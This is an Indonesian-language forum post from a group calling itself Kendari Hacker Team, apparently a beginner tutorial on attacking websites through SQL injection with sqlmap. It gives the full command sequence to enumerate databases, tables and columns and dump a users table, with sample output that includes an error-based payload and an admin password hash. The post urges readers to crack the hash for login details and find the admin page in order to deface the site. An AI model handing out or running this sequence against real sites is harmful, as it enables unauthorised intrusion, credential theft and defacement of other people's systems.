SQL injection dengan Menggunakan SQLmap for ( Pemula) - Kendari Hacker Team

Assalamualaikum Sobat Sobat Kendari. Dimapun Anda Berada​:slight_smile::slight_smile:

Kembali Lagi dengan Ane. InjectX
Semoga Kalian Senantiasa Diberi Kesehatan Oleh Tuhan yaa.

kali Ini InjectX
Akan Membawakan Tutorial Sql Injection Dengan Menggunakan Tools Sqlmap.

Katakanlah anda memiliki web atau Target yang memiliki url di dalamnya seperti ini

site,com/vuln.php?id=51

dan rentan terhadap injeksi sql karena pengembang situs tersebut tidak melepaskan id parameter dengan benar. Ini dapat dengan mudah diuji dengan mencoba Memasukan (’) Di akhir parameter.

site,com/vuln.php?id=51 ’

Anda baru saja menambahkan satu kutipan di parameter. Jika url ini melontarkan kesalahan atau Pesan yang Menampilan Pesan Seperti Ini

" syntax error" Atau bereaksi dengan cara yang tidak terduga maka jelas bahwa database telah

mendapatkan kutipan tunggal yang tidak terduga yang aplikasi tidak lolos dengan benar. Jadi dalam hal ini parameter input “id” rentan terhadap injeksi sql.
Meretas dengan sqlmap Atau Manual Dengan Menggunakan trick Sql with Dios (Dump In one Shot)

Sekarang saatnya beralih ke sqlmap untuk meretas target anda. Perintah sqlmap dijalankan dari terminal dengan interpreter python.

Untuk Windows: cd:/dirdimanafilesqlmapdisimpan/sqlmap/sqlmap.py

Untuk Linux : python2 sqlmap.py

python sqlmap.py -u "
site,com/vuln.php?id=51"

Di atas adalah perintah pertama dan paling sederhana untuk dijalankan dengan alat sqlmap. Command Itu Berfungsi untuk memeriksa parameter masukan untuk menemukan apakah mereka rentan terhadap injeksi sql atau tidak. Untuk sqlmap ini mengirimkan berbagai jenis muatan injeksi sql ke parameter input dan memeriksa output.

Dalam prosesnya sqlmap juga dapat mengidentifikasi os sistem jarak jauh, nama database dan versinya. Bahkan Yang Lebih Parahnya Bisa MengRemote Sebuah Website Dari Jarak Jauh. (Upload Shell WithOut Admin Panel) Tanpa Melakukan Login Kedalam website.

Berikut adalah tampilan keluarannya:

[*] starting at 12:10:33
[12:10:33] [INFO] resuming back-end DBMS ‘mysql’
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
Setelah sqlmap mengkonfirmasi bahwa url jarak jauh rentan terhadap injeksi sql dan dapat dieksploitasi, langkah selanjutnya adalah menemukan nama-nama Databese yang ada pada sistem jarak jauh. Opsi “–dbs” digunakan untuk mendapatkan daftar database.

$ python sqlmap.py -u "
sitemap,com/vuln.php?id=51" --dbs

Dan Output Akan Menampilkan Ini
[*] starting at 12:12:56
[12:12:56] [INFO] resuming back-end DBMS ‘mysql’
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[] information_schema
[
] safecosmetics

Outputnya menunjukkan database yang ada pada sistem Website Target.

Mencari tabel dalam database.

Sekarang waktunya untuk mencari tahu tabel apa saja yang ada di database tertentu. Katakanlah database yang menarik di sini adalah ‘safecosmetics’

command:

python sqlmap.py -u "
site,com/vuln.php?id=51" -D safecosmetics --table

dan hasilnya seperti ini:

[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: ‘safecosmetics’
[11:55:19] [INFO] heuristics detected web page charset ‘ascii’
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
… more tables
Sekarang Anda Sudah Mendapatkan daftar Tables Dalam databese web Target anda.

Mendapatkan Column Dari Tables

Sekarang setelah kita memiliki daftar tabel, akan menjadi Jalur Masuk yang baik untuk mendapatkan kolom dari beberapa tabel penting. Katakanlah tabel tersebut adalah ‘pengguna’ Atau ‘Admin’ dan berisi nama pengguna dan kata sandi.

command:

$ python sqlmap.py -u "
site,com/vuln.php?id=51" -D safecosmetics -T users --column

Dan Hasilnya Seperti Ini:

[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table ‘users’ in database ‘safecosmetics’
[12:17:41] [INFO] heuristics detected web page charset ‘ascii’
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text

[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
±------------------±-------------+
| Column | Type |
±------------------±-------------+
| email | text |
| hash | varchar(128) |
| id | int(11) |
| name | text |
| password | text |
| permission | tinyint(4) |
| system_allow_only | text |
| system_home | text |
±------------------±-------------+
Jadi sekarang kolomnya terlihat jelas. Anda Bisa Memanfaatkan Data Tersebut Untuk Berbagai Hal :smiley:

Dapatkan data dari tabel

Sekarang sampai pada bagian paling menarik, mengekstraksi data dari tabel. Commandnya Adalah:

$ python sqlmap.py -u "
site,com/vuln.php?id=51" -D safecosmetics -T users -C Name,password --dump
Perintah di atas hanya akan mengambil data dari tabel tertentu, mirip dengan perintah mysqldump.
Outputnya akan Terlihat Seperti ini:

±—±-------------------±----------±----------±---------------------
| id | hash | name | |password
±—±-------------------±----------±---------------------------------
| 1 | 5DIpzzDHFOwnCvPonu | admin | bf9d06d8b1aee59b19004f486ae0de3a
±—±-------------------±----------±----------------------------------
Kolom Password tampaknya memiliki hash kata sandi. Coba pecahkan hash dan Anda akan segera mendapatkan detail login. Setelah Di Hash Passwordnya Adalah " Kendari Hacker Team" sqlmap akan membuat file csv yang berisi data dump untuk memudahkan analisis.

Apa Selanjutnya?

Langkah Selanjutnya Adalah Ada di Dalam Genggaman tangan Anda:D. tapi Jika ingin Mendeface suatu Situs Dengan Menggunakan Cara Ini. Saya sarankan Mending mencari Admin Loginnya Terlebih dahulu…

Terima Kasih. :slight_smile:
++++++++++++++++++++++++++++++++++++++++
Kendari-Hacker-Team

  • InjectX - k4tsuy4-Gh05t - MalaikatHati Defacer Sakit Hati

makasih…salam kenal dari makassar…:slight_smile:

Sama sama, salam kenal dari Kendari :metal: